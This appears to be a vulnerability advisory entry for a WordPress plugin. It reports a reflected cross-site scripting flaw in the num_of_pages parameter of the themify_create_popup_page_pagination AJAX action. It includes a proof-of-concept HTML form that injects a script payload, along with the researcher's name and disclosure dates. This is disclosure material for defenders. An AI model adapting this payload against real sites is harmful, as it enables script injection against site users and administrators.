The plugin does not sanitise and escape the num_of_pages parameter before outputting it back the response of the themify_create_popup_page_pagination AJAX action (available to any authenticated user), leading to a Reflected Cross-Site Scripting
<html> <form action="https://example.com/wp-admin/admin-ajax.php?action=themify_create_popup_page_pagination" method="POST"> <input type="text" name="current_page" value=3> <input type="text" name="num_of_pages" value='7"><script>alert(/XSS/);</script>'> <input type="submit" value="Send"> </form> </html>
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-14 (about 1 years ago)
2022-01-14 (about 1 years ago)
2022-04-12 (about 9 months ago)